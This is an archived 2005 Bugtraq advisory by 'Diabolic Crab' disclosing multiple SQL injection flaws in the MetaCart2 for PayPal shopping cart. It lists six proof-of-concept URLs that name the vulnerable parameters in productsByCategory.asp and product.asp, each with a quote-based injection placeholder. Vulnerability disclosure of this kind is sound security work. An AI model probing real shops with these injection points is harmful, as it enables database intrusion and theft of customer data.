lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Date: 26 Apr 2005 14:35:34 -0000
From: dcrab <dcrab@...kerscenter.com>
To: bugtraq@...urityfocus.com
Subject: Multiple SQL Injections in MetaCart2 for PayPal




Dcrab 's Security Advisory
[Hsc Security Group] http://www.hackerscenter.com/
[dP Security] http://digitalparadox.org/

Get Dcrab's Services to audit your Web servers, scripts, networks, etc. 
Learn more at http://www.digitalparadox.org/services.ah

Severity: High
Title: Multiple SQL Injections in MetaCart2 for PayPal
Date: 27/04/2005

Vendor: MetaCart
Vendor Website: www.metalinks.com
Summary: There are, multiple sql injections in metacart2 for paypal.


Proof of Concept Exploits: 

http://example.com/mcart2pal/productsByCategory.asp?intCatalogID='SQL_INJECTION&amp%3bstrCatalog_NAME=Computers
SQL INJECTIONS


http://example.com/mcart2pal/productsByCategory.asp?strSubCatalogID='SQL_INJECTION&amp%3bcurCatalogID=10001&amp%3bstrSubCatalog_NAME=Laptops
SQL INJECTIONS


http://example.com/mcart2pal/productsByCategory.asp?strSubCatalogID=1&amp%3bcurCatalogID='SQL_INJECTION&amp%3bstrSubCatalog_NAME=Laptops
SQL INJECTIONS


http://example.com/mcart2pal/productsByCategory.asp?strSubCatalogID=1&amp%3bcurCatalogID=10001&amp%3bstrSubCatalog_NAME='SQL_INJECTION
SQL INJECTIONS


http://example.com/mcart2pal/product.asp?intProdID='SQL_INJECTION
SQL INJECTIONS


http://example.com/mcart2pal/productsByCategory.asp?intCatalogID=&amp%3bpage=2&amp%3bstrCatalog_NAME='SQL_INJECTION
SQL INJECTIONS


Keep your self updated, Rss feed at: http://digitalparadox.org/rss.ah

Author: 
These vulnerabilties have been found and released by Diabolic Crab, Email: 
dcrab[AT|NOSPAM]hackerscenter[DOT|NOSPAM]com, please feel free to contact 
me regarding these vulnerabilities. You can find me at, 
http://www.hackerscenter.com or http://digitalparadox.org/. Lookout for my 
soon to come out book on Secure coding with php.


Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ